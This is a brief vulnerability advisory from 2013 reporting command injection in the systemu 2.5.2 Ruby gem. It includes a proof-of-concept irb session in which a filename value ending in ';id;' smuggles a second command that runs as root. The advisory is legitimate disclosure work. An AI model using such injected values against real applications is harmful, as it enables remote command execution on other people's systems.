Systemu 2.5.2 Ruby Gem Command Injection

Larry W. Cashdollar 7/22/2013 @_larry0

The systemu Ruby Gem doesn't sanitize input before shelling out. Depending on the context if other gems use this to execute commands, for example
running imagemagick to process an image file and they aren't santizing input themselves you can inject commands remotely.

The Gem can be downloaded here:

https://rubygems.org/gems/systemu

PoC

irb(main):038:0> userfile = '/tmp/test;id;'
=> "/tmp/test;id;"
irb(main):039:0> cmd2 = %q(file) +" "+ userfile
=> "file /tmp/test;id;"
irb(main):040:0> status = systemu cmd2
=> [#, "/tmp/test: ASCII text\nuid=0(root) gid=0(root) groups=0(root)\n", ""]
irb(main):041:0>